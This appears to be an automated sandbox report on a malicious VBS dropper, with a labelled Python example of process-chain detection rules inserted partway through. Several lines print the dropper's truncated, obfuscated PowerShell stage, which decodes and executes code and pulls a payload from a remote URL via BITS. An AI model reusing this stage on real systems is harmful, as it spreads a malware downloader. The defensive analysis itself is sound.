                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_0595C7EB
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_0594D73D
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_05962721
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_05948653
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_059538DB
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_05962009
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_05965BA4
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_05963BC5
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_0594834D
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_059622B4
                    Source: F8HYX5HOgA.vbs | Initial sample: Strings found which are bigger than 50
                    Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 5806
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 5806
                    Source: amsi32_4856.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 5708, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@11/11@3/4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FF848E8AF80 CoCreateInstance
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6388:120:WilError_03
                    Source: C:\Windows\SysWOW64\dialer.exe | Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lgxm3ru0.slx.ps1
                    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5708
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4856
                    Source: C:\Windows\SysWOW64\dialer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor (2 identical entries)
                    Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: F8HYX5HOgA.vbs | Virustotal: Detection: 46%
                    Source: F8HYX5HOgA.vbs | ReversingLabs: Detection: 42%
                    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs"
                    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-Br
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-Br
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
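The process chain listed above (wscript.exe, then the 64-bit powershell.exe carrying a 5806-byte command line, then the SysWOW64 powershell.exe with the same command line, then wab.exe, then dialer.exe) is the part of this report that converts most directly into endpoint detection logic. Below is an added example, not part of the Joe Sandbox report and not any published Sigma rule, of that logic in Python over process-creation events: a script host spawning PowerShell, an oversized PowerShell command line, 64-bit PowerShell re-launching the 32-bit build, and wab.exe with an unexpected parent or any child. The events are constructed to mirror the chain shown here (PIDs 5708, 4856 and 2780 are the report's, the other PIDs and the padded command line are made up), and the 4096-byte threshold and the list of normal wab.exe parents are this example's own assumptions.

```python
from __future__ import annotations

import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (Sysmon event 1 / Security 4688 style)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
MAIL_LOLBINS = {"wab.exe", "wabmig.exe"}
# Assumption for this example: an interactive launch from Explorer is the only
# parent treated as normal for Windows Contacts.
NORMAL_WAB_PARENTS = {"explorer.exe"}
# Assumption: the report flags a 5806-byte command line; 4096 is an arbitrary
# threshold well above ordinary administrative one-liners.
LONG_CMDLINE = 4096


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def detect(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Return (pid, rule_name) for every event that trips one of the rules."""
    by_pid = {e.pid: e for e in events}
    hits: list[tuple[int, str]] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        img = _name(e.image)
        pimg = _name(parent.image) if parent else ""
        # Rule 1: a script host dropping into PowerShell.
        if pimg in SCRIPT_HOSTS and img == "powershell.exe":
            hits.append((e.pid, "script_host_spawns_powershell"))
        # Rule 2: the obfuscated stage is carried inline on the command line.
        if img == "powershell.exe" and len(e.cmdline) >= LONG_CMDLINE:
            hits.append((e.pid, "oversized_powershell_cmdline"))
        # Rule 3 (heuristic): 64-bit PowerShell re-launching the SysWOW64 build,
        # which this sample does before injecting into wab.exe.
        if (img == "powershell.exe" and pimg == "powershell.exe"
                and "\\syswow64\\" in e.image.lower()
                and "\\system32\\" in parent.image.lower()):
            hits.append((e.pid, "powershell_x64_to_wow64"))
        # Rule 4: wab.exe/wabmig.exe with an unusual parent, or with any child.
        if img in MAIL_LOLBINS and parent is not None and pimg not in NORMAL_WAB_PARENTS:
            hits.append((e.pid, "wab_unusual_parent"))
        if pimg in MAIL_LOLBINS:
            hits.append((e.pid, "wab_unusual_child"))
    return hits


# Constructed events mirroring the chain in this report. PIDs 5708, 4856 and
# 2780 are the report's; the rest, and the padding, are made up.
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
# Stand-in for the 5806-byte obfuscated command line: the real prefix, padded.
OBF_CMDLINE = ('"' + PS64 + '" "Function Krse ($Udrensnri){For($Holdk=7; ').ljust(5806, "x")

EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(3100, 1000, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\F8HYX5HOgA.vbs"'),
    ProcEvent(5708, 3100, PS64, OBF_CMDLINE),
    ProcEvent(4856, 5708, PS32, OBF_CMDLINE.replace(PS64, PS32)),
    ProcEvent(2780, 4856, r"C:\Program Files (x86)\Windows Mail\wab.exe",
              r'"C:\Program Files (x86)\windows mail\wab.exe"'),
    ProcEvent(6100, 2780, r"C:\Windows\SysWOW64\dialer.exe", r'"C:\Windows\system32\dialer.exe"'),
    # Benign control: the user opens Windows Contacts from Explorer.
    ProcEvent(7000, 1000, r"C:\Program Files\Windows Mail\wab.exe",
              r'"C:\Program Files\Windows Mail\wab.exe"'),
]

if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"pid {pid}: {rule}")
```

Against the constructed events the benign Explorer-launched wab.exe and the wscript.exe itself stay quiet, while each link of the malicious chain trips at least one rule; in production the parent lookup would come from the event's ParentProcessId/ParentImage fields rather than an in-memory table, and rule 2 is the one to tune first, since long but legitimate PowerShell command lines do exist.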
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 
'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-Br
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong 
(Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-Br
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
                    Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bitsproxy.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
